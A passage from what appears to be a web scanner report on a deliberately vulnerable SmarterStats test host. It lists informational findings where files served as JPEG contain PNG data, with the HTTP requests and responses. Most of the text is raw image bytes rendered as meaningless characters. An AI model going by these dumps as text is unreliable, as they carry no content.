uqU.9\`....X#.c    ..    .q-&....Q..gYC3jH.....nZ..#cSg...X.f.R.Y?..|..,l%"J..r&"4.2Z..1#l25.Uu...?....52....`!"... ...C...QF...b.c..#C3g...X#e    .......l:.......DD>H..X~...a.FGY.$Te.....7W.kL..^_...~>"D....o...m........s8hr.*...YU.&-G.....>...DDi..G"zl..........x.BU....^GI.BD..*.*..Q.....y.. ..U.9r6..........}..R}c.Yg......D.q..)....p.u..+.=.D..}].|..:.-.Ue...Y......4u?B.fi..9@Dtv......1....#...'<B..BO.e..;..).$.Ue...Y............1.76.y&...GDt..p].....1....q,...A ..$.4....,...1.Fd]i]e.`Y.C.*c.-b..1.4....tT.....R7..........Q.....]2S..v......5.<...."....f.m....i1c..O.~:......T.j...1^.h'z..N.|...R0>.X...w.q.*.Y..P..X....hr%.76.q.....Q...h....u...l...."!.........,kw,TU....;..(.76.NDz6.5M.......`.}3Q..)5..m.3X..E(..3..F......:.c.aUWU......9~.1....B..}..@8..[.....r..]V.9Q .,.....,.p,TU.q..........U..
.k.y..z.5v.y..2.....Zf...4..^..Z..:.5P.n.*.8....wg...&"...cV6:0..*4...\@....O.^Uu.[.\.W.k.u?J.L8~...SYP........&".N.(..:..b.YZ...ASg...X.d..4|........V...LE....=.mO...s.,=..*b...0l...9."......D...(k.    ...6V.9<.C.c.....W......Ol<.dV.HD....@B......1CasU.9l.q)[E.1P.0...D...R.BD.>._Tyh.].rzl.*:.>.e..5...-...{.}b...8.DD).QQ$......6..U.98F..L....6..*.............%]TY.......z.U5.....\...>YXQm..BD.,.h"B...q.&...spq.C....D^..&.......|0..d...d.Oy.BD.7.]...h[."..:f...q..F..?/....[........M..>LYR...Eo....h.....N:.e22F.6FT0.=MK.m.`....Rr.
Q.<u..f.>....?h.3........s,t..7.n.,z...7i.@.(gg..^GD.......{[%.f12...>.D....8=Hg.?b. ..DN...^Y..2.;.ht[_.:.D.....DD....Y&.$....P?...,%g....CgCB.S..m.g{/7..Y32..Ul.F....<J..l}aR.(S.u....=.C..^J..n.okd.......v..!..........=H....a.......D...J]D[_.dFn...ED.....i:-.;Ndkd.F..|.z.....`.oS.....{.....n.Q.7u...1.....x....e*..h...YOdkd.`rRE.z..y.-........p..i.*..O''...Fot.0h.(.......<.x.n...ED.......]Odcd,..$....t~.O.d.0u.l..v.H..m7Mi..YM....~.."r.@...Qc...G....3.#s...*B.{P..P.$.....66.\.a...F.'.=W..e.o.q..lD"...h...e(/6.-..12..x..To.....V....<......sfy.At6$....j_#.K..O.M..z.S.........c.eA+D....m.'J...kd,.H.B.6fRV.q.z....Go..l7p..:.. fl.....
....DF.    ......lH..........t>..9.Wo..a@...UO!"N.......fY.r/-p.#e[.........m....7.r..o,..CL..ZM-..2.>x>.IF....v....
...Q.{..!.R..^..zHm[....XY[......OIE$............>b......p.s.]......<`).;....9...DDi..Cc..Aq..f.l..7'j=.b.6.........3.^.F/.\.fR..m.7..%...".+........R.^+....g..X.bZ.t;}E.=w.9.M...u....}.....~=.`A@.R.~<..4z....>D.R....i...)../...ST.W_........ iD..I...0....'............ .....o.h.u.Z.P......Q.Y'...'.#"8[.
.....S.0....,.f.....G.....r".w`..8.$....GI_......Q.qv..g..U".{..9..'...V'.?t[A..{....A...6.o.p...    ....^h'....L..md.^.:A/...1.....w$UGs..-.{t4d..q.BDq..q.,N.m...@Ze$.q2 CF......A....N.]VQ.2.Q.......!.DU.....o..;...dW..Z.....i.m.61.....2.M.(.}^..........w.t......7...\.,D.C........t..- .    j.2.w..^%#z.....UU'..(..C...C.....?.....M.=@...]@..
...}..}4..].1........Q..x...\...Q..LQ...u.q."bDD*.........!.]...{...b..m.........,]3..%....x..w.:.6..w..f.c.zB....V.^.:8..Qg....!.\V..ED.
6.....(,...@..(.v....9.....n^y9A .....h'.R..............@."D.t...h.    .H5Jt.uo............~..F2.UL......x]i:..k.    ....b.k...7...o..<.E....0..tK..y.
...;b,f....n.>..D.....ERC.2..S.........~sMD.9q-
.....%.).R......4AW.....I....."...S.#..1,...W..Dd..p.hD..-...j...+.l.:.O....d.u.^.FD.z....V..k<..E.E...j.:...n....W..GD1..2.]."2o.........5Y....=...&j....S"....H...j.:.f...F.vW2.k.7""B.a........>5"*H..{...(..:VZ...EI%......t..I..H.;..9... ..-J....<...B....u.X.&).v.9@D...F.Dr.1...Vdl...%"..E.............7.(jx.#...C...e..D...J..o.....v.~Qi.o^..#y.?..z."....Q*    5.....i.h..0...............z.E..Muu.;...Z.E.8.9..q.............8V.7..=..o*U..Y.t.P..Y..R.k3..9.t..D.];:}........t.I.J.K%.....4#"j.......:..6..c.ic..w...y...Q...... P......
.. Pq...*n....@..."*C+...@...".......e@@.... :...G@.... ./....!.2... .T..!...... P......
.. Pq...*n....@..."*C+...@...".......e@...w..A=.......IEND.B`.

10.34. http://vulnerable.smarterstats.6.0.host:9999/Temp/91331a080c0148b0bddd5d75991acb5b.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/91331a080c0148b0bddd5d75991acb5b.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/91331a080c0148b0bddd5d75991acb5b.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 9872
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d..&%IDATx^..Wp..y...s.....s.T....Eg:.>......H.H....L.....Xza......l..l..*.......Y..v0=......P..........]...!... ...@....@...%.:....@...... `.6....... ...$N.aK|.h.. ...@...@....@...... .8..-...y.... ...@.a#. ...@....@........A...... ........ ...@....@... ....@......2...f....8s..k..}..X\.9>k{u..qR    ..... .3.[k..]G..q...E.....3.........\...q+b.K...I....b|.m.....|..w..'u...!...... .D..Ys..Ys..w.l.<d.\..t...37......S.....xS.{......Ys.V..V..]1s"7...~.;......... .......B...YuWm.wWi.9m......=`a+..
..a;.i......l........3-... ...(..;b.......A.|l.r.,a3.s...R.rO;).as.....].y.mcc..y..{....6;;;....r.. .z..n.....cn..?..//.+#i....b.Rf'F.\).6%k...%Q...@..:...........Z.&v..g..$*=.y...Y..'..K..n:........(.S .....6...z.............}o..z..(9Ca..L..3...p..X(.l....q.M....M..:. 0...Fb@@.@..U}...Ct.3.....iy.hq.A.H.........}....^....5.e......k.%C`......-=.....uk...q.....-.P...;V....V.G...B A..[..B..C@g...s[.0.F1:............/.
... l.........4F.a.4.$|$.T.%..-.a.....~E..P..i.H.H..&K..[..N.#.`....aK.4    ..8..a.@..9..*.._i..;l.......j.$..e9.t:....H..aK.4    ..8..a.@..9..*.._i..;l.......j.$..e9.t:....H..aK.4    ..8..a.@..9..*.._i..;l.......j.$..e9.t:....H..aK.4    ..8..a.@..9..*.._i..;l.......j.$..e9.t:....H..aK.4    ..8..a.@..9..*.._i..;l.......j.$..e9.t:....H..aK.4    ..8..a.@..9..*.._i..;l.......j.$p..C..c.eR..1...4..a.4.$|$.T.%.'k....
.<[~.&........i.H.H..&K.....P`..e.'5.i..4r.a.4.$|$.T.%.B..D(0@....B........Y>.n....^]1.Y:.cq.........ak"...88./..n...g...</..N..4Fr...e.[.[X...k.fq......|..L...cI..@.....@!lo$.. l.L.....+......;kN.f...E..Us..=.2.$|....S....bW[*
a{....a.....C..&Bq^........l...3[{...x.P..!.............T...6B...6.y...._M.....U>..$f.;o.......0..g.{.'.7.'l......
a{=....e..{.B...YS-.....\.mJ.^....&+j.....D(0`.m...a..aKc..........Y7.....K.>.R..8a....K.3@..d.a.`bj.".W.9...M~....;..o.N...P..#l:....__G(0@......%.W.9........Y.\6.a!.....\'lfw..Y.....P`...k..h-.....ef(l.q..[.I....~N..y....ZY!D.....B...6..g.n.~..O...
. ..E..-`.T'lje..e....*.6.    ).k._...OC........@'^...?..F.2(.......-.I%B.X."@...a..$q
   /A..exa....B....y....a...3o.X..%(.~.M.cc)$|#.,Np.v..5B.A!l.$.. lYLM.v..+..@."..    .    t..8a.c+l.,..MOV...'....^...3._|.<kn..vk.......3[\wN...ptV...    }p.Gj..tC.......fP..+....[7sEJ..._...KG....E.o.;d.\.........U.ur..q...i{<%h
mA....*2(.#..j.#..........T...P`..u7_.Rs..ew.f.........]...i{<.^Z.@...N......B5..p.v.
.!..a..U...."....U......N.......K.{..]6=wa.ku..=.
/.v lZd..Hd.U...OYY!D...v.P`...k..hm.....Y.sk....YC..F.a.c.oI!    ..)T.!.'lhe..e...._F(0@.:.0..:d.
.......a;8.V..I.V.rr/    8a..+l.,..MOV..^N5...Z.&n.(n:..].8~.\...0nd.9m...:....Hc.....B5.....I++.(.B..    ...[w.E*5.._..zT>.6...N...G........I...T.i..a..:................F.2.R....
...n...j.Z.n.....}..B.a..$p.V..4."".@.dE.._.MOV....D.U.._..lk...q..B."..N.Gj<...p..{...!......
..6.?........!l......:.j......B.....V..q..[..J...~E..P....I...^.b..@.dE...B.^L(0@..?......y    ...a...X
   ..(........F.3(..E....-..i.N.~.........q....3[.Q.._\..x.i8I.&By.........Za#.. ly.M.....=.d..[...}D.V..-l.6...M....4.'N..........8>.b...s<`tH..H.........!......
....&....~M.r...|.1.......mB.
1s.k..j....!.C..P..9^.V.....
a{....a.....C./..)G...w.........uZ.....\Zw.......{V...."o.N..ZY#d.x....6B..c.......M....,v..8....K.[..H..........6...6YQ+......
..aKt2..,..i.S.........}It.sV.u.a...N.QjI.    .o}l..fP...........6#....:.....&oa..a...`w...x......28.    .oZY!d.x...s    ...[..SC.Y......m.y...........H#A..
.MV.J.E..d.a..,..?.[{f...^.4..*...E:.z....G.    a...=.P`...=..h...1.........eG}.sl...a...UA.G..x5....z...aB........y._.9..!..nQ..@.t..K'.#.N..'l...mB.A!l.&.. l.O*....U}0n.....a.g.k .#.N..'l.fe..e....*......y._..8w.\Z..i....n....WR.C..EHv.-...T....Z).^*>.,B......E...[.w....<..x.-.ev."QN..'l.......
a{&...aK^.n!..M8.|.-...g..s#.D.N.~..
!..a..U.m.S.\.`.......61...D.G..x5......[..3....[..J..e.~.o4(>..>.V>...w..D...a.g.k.:.#1.C5N.........T|........3.n..]........u.....J...l...Sas.&.pb.l..W.Y.....i...|.>..>.....VV.Y....."l}.Yt....U>...(.*...:....U....}_.N..(5....v.u"l..V.o!lO#.. l..'.Z...U...GxT..1..v.B.a...Q'i...hw..i....h..+.7......'lo..W    a...=.P`...j.Qil..W.#=...e....2....Y.f.ls....K.*s.....MGV.6=YE...8:nB...1.J..^.M.B....1(._...7..%B.....?.P`...?.h........fz...%..d.;........|.R...7|.*!....'.
......z.d...%Z.9jL.w.:!;./}....lz...d.>:.$+D.td.a..U.-..$j.X..w..
.1Y.%Z.t...    ..(7..    .....!....'.
...........{.hqi.=.-..........y..t......B.2.R..DB.......es..Ys...Z.,[....,.....3j..F.F.....        ?..<x_..-YY#d. lz......}(.d.Jc$;..4:>n..Q"n!.~v......7....o..    .D(...6YQ+....'.
...<...z.v.....<P....Y.....z..i{|.....].4..3..(_<3z..?^~...Y>1zN\....i...ErJ.    8a{..W    a.^*>.xB......F..../...Y)l.K..Q...W.YwN....N..N.......k...rp\..w...u.C..U....9.$....VV.Y....."l..jD...~..l..X.........L..^.;..q.N'XX....w.:.;..v..G.T..~B...-...#l..........).s.J...k.....
a{....a..l#....k,X....T^+[.G.F..=...6%._]...U..[..%Z..s......I+.lz.m..mll....bgg..y3....E.3.R....
..[......5..wk..q./..&3.......Z...
..;V~g......0.......mC..........6=Ye..._.0..a...0..&.9.a]..}.G.2o.Q.T.bu......vw...........    I..b8.......
.!......
....O:..o.~U/{N.8.........;..q.......9..ju.-8oas<....|...zD.......~++.(./....F.3@.2..j.:...2g?.c.k..>.#.Q!.#...j.......\.$....p..J+k.,.B..M(0@..2.......6...Y...}.)........@.".*.*..>....}. l..V.o!l.".. lLi:...<.....u..C..o>@."..N.Gj<...p....m....T|.
.!..a....mA._i.]..V|.....48....WG..
.....
!....G.
...^L-..d.R..\x..V..}.........U.'..    .J.MB.dE...B..A(0@.:.(.........w...]./.N.@.5|.
[.K.;5.........%..c.R.N.....    a.^*>d...g...4.t....n.O.....[U^.-.x=H.. .%(....MGV.a{8...a...3o.X..%(..D.m..V..    /..}/.    .....!......
.....:.....1...........G.TB..V..../."lAy..I^..ce..e.....%.. l.LO..E.
Y+................q.(...p..he..e....*...|..CI.zS....H7....@..L~..%.q......Za#d.....B.......U..].\^..f.-..'......v..
!..K...L(0@...X.l......Y...C].....o....:.j...K.....
a{....aK|R..<......@.. I.B.KP............*...yg...~."X....(.a.7.[...o    l..;a{..."..x.8.@B...6...E.X.
X....7...c....[$.$|$..W....j!l. .. l.O*....U|5U.X..~..H.I.H....    .....!..a..U.-.I%B.X.f...w.F..Q..[$.$|$..W....VV.Q.....P`..%>.Dh...l.7....H..[...[.    ..w..9a{..5B....;.G(0@.R.M....k..[.K...E.y.>....q...+l.,..MOV...'...c.*>.v....h.W....l....3[cR.w.....Z..x.i.I.&By....v++.(.B..K(0@......%.....c.%.....M.h........E.0.%.+f...g........28.    .......
a.eB........E..Y.x.[..#![]....]..Us....i4    .Bi..8a{..6B....'.........~5...z..D...Y/lf.......C...a\r.....C.......$..x.X.%B..c........U~t9..|..h.....6w.....v.%$lu.M...?..kq..\++.,.B.~.P`..[...~.X..M..7...B.Qs.y..~....7..7....qI4
.,+qy..+l.,..MOV..,...N#l.a.~.\*%....i...[.pe.m...-s|i.M.....E..@.../l......
a..B........E..Y.A.;mqr.a+9W.mj...z.I..jq.v...!..K...P`...03..G.-..@."..    .    t..8a{..6B....'..[..J...~E..P....I...^.b......++.(.B.~.P`........_...y?.&.......Q.'8a{..5B......,...a.bj...._i....i.H.H....a...R|.6=YE...T"4..+...*...H......._...g..+.0.B.~.P`........_...y?.&.......Q.'8a{...B......4...a.bj..h...a.4H.[$..W....Z)....."l.O*....~._.~....~e........j...i{<....@."..K.H.....8a{.;.B.3(.......[g.E2..._^..](....`.UN.........J...i{<.b:A.t..)5$.#5.j:$.........$...a.p.H.......9...m.....s..O..Z3.65....O.H......=.......6=YE..N.IV.........f.3v...e_...s...N...u..=.$<.F!l.0.+
a..:.j.....
!.....B........y..../DG....a.c.oI..>R..&>.'lO..F.2.Rq.>....-.<.Z.......~pITn4.69..[$.}..a...R|.a.    B......G..A.6C.|.../.+..........Lw.-.a.44A    ..-T...'lOy..    a....."l.......~.8W<.c7v....h.'o...Q'.>.#.Q!...j..&E..............'[Y!d.x.8........    #.....[kg...HW.n...ix..>R..F...&+j.....c....M......._...k.zL%~...H.u.>R..F....'....0.B.~.P`....... ..4..a.4.$|$..W.......w[a#.. l.O*......r@..[.$.SHx    ../.    ......0.B.~.P`........_...y..v.,.8m.".bq......J..M.A.7...u.gO..B.2(...    ...[.s.~.d.J#...6'e.g.....i..V.........I]....$.. ep
.&+j..z...
.!..a.`bj.".W.9...M....9...ms.....J.>....q.....!.....".. l....z...D(...[......4...i13..~'..x.P..!......YY!d.........m..RS.Y....y.a._.-/..'l....%.....1D...6YQ+..K.i+l.8...y+.y.a.#dM. l..k....qI.)mx.....=...D.3(...........}8.C......m...a.8.e.....r<`,I..H.....1VV.Y....."l.LL]d.J#.....gv......R.F.lm...4.$|..<^G.dE...B...P`...17..K..4r ka.9.$|L........%B....S.G(0@...Ob...+....A."..    .    t.. l:.....*......y._. .T...@.8......2..=......
a.^B.....yg...~.KP.......RH.FDY......EB.A!l.C(0@......$.W.9..E...>....A.td.a..U.-.I%B.X."@...a..$q
   /A..e8a{..]"d.x.x.w.
.....;....k^.2.G.d86.B.7".../lke..eP..w.
...,.&...`...H...E..x5N..ne..e....*......y._. .T...@.8......2.6YQ+.....$.. l..w.......e....pl,..oD..    N...7_$..x.x.w.
...,.&...`...H...E..x5N..je..eP....
....'...c...9.
.-...)$........!V..Y....."l..w.......e....pl,..oD..    ^.N~..f.....F(0@.....$..aF."...    t..8a{...B.A!l.J(0@...T"4..+...*...H......._....Ya#d....-.........=`.......6.........8..._[Y!D.x.x..6B.......%...3..i...H....    .......
a.fB........y._. .T...@.8......2.6YQ+....o".. l..w.......e....pl,..oD..    N...W_ ..x.x..6B.......%...3..i...H....    .......
a.FB........y._. .T...@.....b...bq.f..I.`T.>.a...R|.a..B...6.)).s..........KkW....p..[8+c.m...us....Y>.b.......a.qV_    8a.._..!..K.[.........6r..Z...5...37|.W....f..\.(....E..............-....$....j!l_O(0@..9.H.:d.r.k.]...%..kY.[...#h..f..VP    !    .T.'........%B.A!l_G(0@.z=..4>d..#h.....]...B
..[.L.......{:....s....0 ...r...U...k.....5.. l-d..."l-.qI..,N.@D.!;...CU....../....9.....M.[..R.M...........@...}.....hI ..k......Qn:h...t.....    .}.G.j8...... .+.<.Cw..6].....@.......&...... ...@........M./.C...... ...     ls#...@...... .K.a..K...@....:b....S.....s......S.5.o;e.E.{..q=...gH.....@ ...-.e.....    xY.04+bV........Za+.8r."l....N.n38[..p.. .1......z.@................k.#.G...5'm...v...j..3.....R$...8*.    ...p"6s+.*[....anG....;l....fj..m../. .2..-...m...@..WE...
a.$K.&..&...=....i...$.$l\.M#.h.. .?........ .|...%Q.....r...?.L.d.I.......f.@.H..@ ......q.....\.Gw..{.(..Hf.i.. p ......&.@...... ......55A...... ....@....7A...... ..x...x..    ..... .......v l.    ..... ....#...cMM.... ...@.@....a.M.... ...@ ...-.kj... ...@...".....o... ...@.... l.XS.. ...@...8....@.x.. ...@....G.a.... ...@....... l.... ...@....@<..[<.....@.......D....@...HG.....IEND.B`.

10.35. http://vulnerable.smarterstats.6.0.host:9999/Temp/9b829667b5214dbb92b4f41517bde32f.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/9b829667b5214dbb92b4f41517bde32f.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/9b829667b5214dbb92b4f41517bde32f.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:12 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB92FEF80"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...^IDATx^..Y.5IQ.....TD....E.'D.#"...8 ....y...l;...p......>.b7*t..]...Pf..Y.j..<.U..5..[+.......Q.OEFfE=..., ....[....K., ....@.I ....[@ Z....d.Y@ ....d..- .-~.t..., .i..............Y@...4.d.Y`q..D...]., ...D......n..<..n.nN.....U+...t.e.Y`..X    .....,# zt.\..E..........h..P...X..b$d0:...4.7..,..GA...wT...6h...(Z.>.:...A...-.....6O=.T+O?.t.../Kd.....x..W.Q.^......i3@. .[.`..c.c....=......7el..Q?!....'.].    D~h.2..jg..;....r.V...../...j[......T.....    6U;S..Q..o......].......@ .....d.o. ..v....S&.T.L]lG...i..H....m..V....z.....].p`...<s,;w|.........=....    Ds,~..)7`..=....<.g...."..Ds.2.[ED~Fe.......V.;>.........n.\.........go..A."...Z.V *4TA3&.<t.5...>...B..@T...M..Z...{...j<t...s...D?.......r.......vSn@A..&{..16T.e....._...2w|S..@4...5s....)...b......B.@...Z.......W....G...^..O..!d....;ED..Q.n.(.VK..F.=..%.. ...    ...""?.2A....j..\...:@.!.....................Z.).>.].Pk..x.;..O..!..At.f..`~[..X...f.".....z...j<t.A.<.......".
.\..8mOE.U......Z
...8[.9.3..<.d.~"..!.
.8=......W6.^......    ........1s(.........".%?'t..G    ....D.9H....P(...'$.... ...".X.s..........h..:.MK3-.J'9*.......L....!D.Q?"....D..,.fu.Sz.c..<t..(9.....5.h..B.....nN[..-.S.|m.k.........W........AT2...(Y]o../<..........""..%...    .B.@T:K+.    D..z....J..C.*....../..t&...@.w#<.Pz5..Py.,.H.~.5..?...ED.....@Ta..FD..
.....1].. B.@..3]O...Q=.......Z.."".._.Q.LZI;...Fx...j<t-.".+.6..... ...t.V...*....."......iU!Vt...a.=...M:....G.PsL}..P    ...P.\...>."".("...... B|.w....{8k...fL}..Py...X.\.5|...D..;7..;ED.x...5~.....).y,j@.Qr b.ra....B...j...m="".....l6...6.".+..Q!...L ....p(...]....G.ED.W...~.._......{..Y....Fu...vSnx..~{.>.].<.Z@...D..p....?..Z.x.........p...L}..P....X.......>/.D....
....jV'.>.Q.K3...5P`.l...
".+.......!r. ./.......h7.Y...F...V}.cC.Qr...CN.[..    D53....Tl.6uI...Z...U...<#.=......<t../9.....5|.o_...FD...@.Y<.n
..Q..9..b........l..(,_.%....1[~o..B<.f.....h.,...    -.4c.?T{......M..,]fK..%...N:.5 d}*"J......$......0......@...SW...CD.-9..N:.5|... "..}.l-............q..,]...y....{...r. .]....HV..D...6.Y.".........S.f..Y..Q.[.Zy..]n..5..l..g.. .@...%.".!.....7/4.....S...D............. ....h..|..5|w..B..2.T......~....Q....Mp..86..%.".i.TD....).U!....A.|..&...&SW...CD.-9.y..Y)...._h."........X...#...u`sl9......G....Kg.....).U!.....P.eS.zX.JtV..M..,]ql..K.D.]:...
.@.@T...V[..;j`...    ...A....yK.D.;t._ji.....!.Q.b..{..ul...D}.sR6.Y.:...(9....v..Y..Q.[.Zy..ul?:...4Q...;KW..s.b....{.4.".U!....A...X.6m..t-."..C..{.2.. .Q.[.Zy..ul..PH_...X.6m..t..!./...+9n....!..DU.)k.."..}6..>..M..,]ql....O ..!.....7..o.G.......+.E.U...^......r.....R b..2Ge..@D\.....v.......l0"...J....$.;t.\@\s{}..,J..O......>;B...k,[).a..cc.]Pg{R....".l.D7.....h../.]7.!.Z.B#.6p.....X.6m.,]...w..!d. ./...h.n.o.y,..@.
...>...Ut.c...y..F....W.t..>.9..:.,]..l.Z..l.J....]...!f....k...9.Z....%a......l|..?..:'e...+...ti...g{RK.o. B..#.a..^.....}-..h.s....K3.!..D.}....rKA.......hK....w..!dC ._f.eSB.Ds5..?H.._.x>.D.....E@.X....J..5.......!.ua...'...q...=..l|.......I..g..cc.]P..SK.o..B..A41.!..c..uH....u<.&8KW..s..L.....B@.....bn(.D;l./...D.e$..\x..eR./..YU.....q.b6f%.M.;.........K.~...KI........8KW.."j.A....k..."..D.|)n.."v)    ..J.....,].D.....dADJ..Dg.@.kVL.LC......].M0v...tq*.......|......k.......#"..f..
}x..uH-:..YY..l..tE[2....:.lO
..Q....F.w..."...lge.O0.b.Z
D.....[BD..FD.w..`......E.......[N..'.5.tE["...-. ...".l.D...v...w...[.......c...,]ql........7..!D . ..D..!.....a.
..g.Z
D.......D......@#.D.sK,8,."f...ROEDo...".l.D.....GD......g.!F..    6.Y.... b...... .....#...........'..g..ccF...=....!.sC ....*'...U{lK.......g.a.!.c.
..g.Z
D......... .!.E......p...Y[w..........d.`...w....S..+..5.v<YKA.(...kU_.......jS..~.
......4I..tE.!.....m!"B..#.1*.e..2 ....X<..4+.Y.]<.Qn.nv..;..;jWp..;KW,...Q...rRc.|.....$57k
...j......[..?O....f.!...o..d5.lH|...5.K....    ...m...P;Y............#.Z.%.`.g.B.j...kK6:..YY..6.Y.:.."...Y9)..[....!..v..E.O.Q..~"..... b;+...Mp..."f..J ."..>.@....v.8.}........Y[..y...X.x..,].........B.@4.W..yDD.-..<lg..`h....,].........2]_.....H j.....d....+...1..XK..D..O..D+..jK6..D..H.c.a    .1#.6..6..!..JA..    .Oq...>V2.&8KW.."j..hd%....&..!..@......J...X."........lAt.@...h. B..M-....J...g.. bF...r*....B...V
".NHt.....-.".....)..%..!..JA..    Y
D.d.Mp..hK6.XKA..[. .. ..@......J...X."....*.....*@.!..JA..    ...vVV..&8KW."b.`.cE`...!.S Z).X;!.y............g..+..B.....}(....>TM...i...+......Mji..."..D    ../..J.._ze% .`..X.x..,]..tH    Dc j.........zH..../..A.vV...6.Y."....*o......>. D ...#hn.E........W.pVV.......(8...%.#b-......>..3.u.9Vg..Q...J/yDD..dt....r`6.Y..-......)@.!.Q.&....2...w.|.Y.T.v.......c..Y.b.|..R.D-..l... .....P.X..}'........    ...i.<..K3..U..(g..8S.SW..P...%
|c;._. ..ED)6.".%jV...._.d..l..tE.1....I%..c.>.......1J...c.....+......b..    .....X9..........|Wwmo. B..S.=.YYKO...."........]....."...D........,0Dge-=..l...b..Z.! d}
D+..+...C..Zz..g..cC8k.!...........@.R....l0..-."..
DyG....?.....H..G.....``..X...Y..-. bE`f.7....QD.E.^?. b..;..sR..'s{;..a..-....>../     B.@.R.....yX`..XKO..,]qlLGE.mR.j...O.H j'.{)...........././.....sB........Oq.R...&8KW......[r b........"...D.u.R b-=m..tE[2....IED..Y...JA.
..:....l..t-.".R.l.E...D......M............S.[....%.Ys..QJ.._.@...h. b...:..Zz2w..-...F)ai.-.....]Z..c..P....=.x>+.^....`\.yX....`.....~...!..z..|..-.,..@.|V.....V..L.F[2......L.bl..@...N_.X.B.w.m............5.......%g.....[R....b.Q
D.... b..g=.../..jkI...K..fA.X..@.....B..1..b.?'4."...(..
...5......|g....Q...%
|c.D...4..x~.Fg..Zbi.X..i......
3...K.....K.]...h D....j.y....&&...:...QO..K^.Y.s.._r...C. b:...
._ ..@.........P......{6....K.j.'..0.........B...........XO...g....&8KW.%.Q[.."......).............(..K..k.cyK..C.!....W..."........X...v...t.@DtT..7.....>'.!.Q1^..n.D.....`.. b:.90K..zM..B..r......3.E.....`G.LG....?... .Q1^..z....[*...m.t!/.>;8.......]...b.Q9_.[z.h.OU....1..!.5.".>..W.."D *.KyC...&Wt.6.X.Py.......C*Y.._
..@T....[...|,}..D.D....[..#....{\.?.../.=@.|.0..1.cEK...k..@T..U....{2......yr`x./~.........YRK3.q........"..e.....#"...Vk..].g.."D Z)..7.&..I...a..}.X..".,j.d.}..\1B..>... ............]...b..J..@.|._.....r......Q..........-r.?......Yk.g...[n|...6.2........K...kV?......?..4.Hs..'.....A....]...2u.u.Y....{w..6..{.....y.....j..e..g}{.....@T[<.Y.cY@..X`s..Y.f..bE)..d.Y..$.f.X?..d..Y@ Z.-.....g......F,.......n..H..<..D......7w%..Oc_.6.J......=..n...7a:'".UX..X......a?.#{?n....o.c. ...R.6EM.."3.F).....Ms...J..G..u.....Y...f.w..+..5...Rk.`FC...n..
.....=....m.3%"...=.....{...LE;...X.WIz JM.     ...=....]..@...c...LU3...\%..#.......-.Q....}...LE;...X.'X.K..U.[.M.\m..Pr|...<..d.v.]...7...Muh8..=...n.%.c.(&....Y...v    s.n&.[.D..T_..,0....$..G..,.i......K...&Y@ .d6.H...<- .M.f.8[?.;~.d.....u;t..........._o)....F....>.dL_............@....z.......H..DS.....9N.N...1..../..^..V..E..$...8.........k..Rw......O.....
a...........M'}3....M0d.....D&..~..wt...k......W.H]ERWp..S...u....n4.....?8[.....J..0..].D.L....bh..H9}..%.o..`R_.../.....EJ.....1..^ ..+.[....n.....v..ZgO....,...HD4...|.O.A .`..@t........`..=.Dm.&.3..;../...2.GW    ....M.(90..l.....S.2..1..f.....    V,s....p.K..(.!.R:..[..F-]Jx....P...)Z ..<E$~zK..7p...xK.h...O.!x...........cD..v....FD...l...e....,;...du..."............o....,.".\...u..    ..."F[}....s.l.;u..{']1*...W.u>.R......+....7...?..<..>d.Y`....Y...e.Y........., ....@4.|.., .xX@ ......d.Y...f.O?..d....D.VT...,0....,.....,.a......C...fY@ .e>.X...<, .yXQ}....,..D...........".+..Y@..e...o.Q..S.@....IEND.B`.

10.36. http://vulnerable.smarterstats.6.0.host:9999/Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/9e3c5a71a82b4267ac3057765f388ecb.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
